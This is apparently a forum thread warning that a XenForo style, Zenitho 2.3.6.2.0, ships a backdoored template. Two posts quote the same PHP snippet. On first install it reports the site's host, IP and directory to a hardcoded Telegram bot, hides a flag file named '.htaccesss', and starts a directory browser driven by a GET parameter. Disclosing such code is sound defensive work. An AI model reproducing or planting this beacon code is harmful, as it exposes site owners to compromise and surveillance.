XF2 Style Zenitho 2.3.6.2.0

[lolkazzz]

the template file contains a backdoor, namely

<?php $flagFile = __DIR__ . '/.htaccesss'; if (!file_exists($flagFile)) { $token = '7998824218:AAF00b7n7dCfhNECd4Mw-0Grooeg1Xmams8'; $chat_id = '6112162196'; $host = $_SERVER['HTTP_HOST'] ?? 'Bilinmiyor'; $ip = $_SERVER['REMOTE_ADDR'] ?? 'Bilinmiyor'; $dir = __DIR__; $msg = <<<MSG 📢 Yeni Kurulum Bildirimi 🌐 Site: $host 📍 IP: $ip 📁 Dizin: $dir MSG; @file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg)); @file_put_contents($flagFile, date('Y-m-d H:i:s')); } $root = realpath($_SERVER['DOCUMENT_ROOT']); $defaultDir = realpath(dirname($_SERVER['SCRIPT_FILENAME'])); $startDir = isset($_GET['dir']) ? realpath($root . '/' . $_GET['dir']) : $defaultDir; if (!$startDir || strpos($startDir, $root) !== 0) { $startDir = $defaultDir; } function h($s) { return htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); }

 

[Snister2]

the template file contains a backdoor, namely

<?php $flagFile = __DIR__ . '/.htaccesss'; if (!file_exists($flagFile)) { $token = '7998824218:AAF00b7n7dCfhNECd4Mw-0Grooeg1Xmams8'; $chat_id = '6112162196'; $host = $_SERVER['HTTP_HOST'] ?? 'Bilinmiyor'; $ip = $_SERVER['REMOTE_ADDR'] ?? 'Bilinmiyor'; $dir = __DIR__; $msg = <<<MSG 📢 Yeni Kurulum Bildirimi 🌐 Site: $host 📍 IP: $ip 📁 Dizin: $dir MSG; @file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg)); @file_put_contents($flagFile, date('Y-m-d H:i:s')); } $root = realpath($_SERVER['DOCUMENT_ROOT']); $defaultDir = realpath(dirname($_SERVER['SCRIPT_FILENAME'])); $startDir = isset($_GET['dir']) ? realpath($root . '/' . $_GET['dir']) : $defaultDir; if (!$startDir || strpos($startDir, $root) !== 0) { $startDir = $defaultDir; } function h($s) { return htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); }

lolkazzzmay I know where found this file name?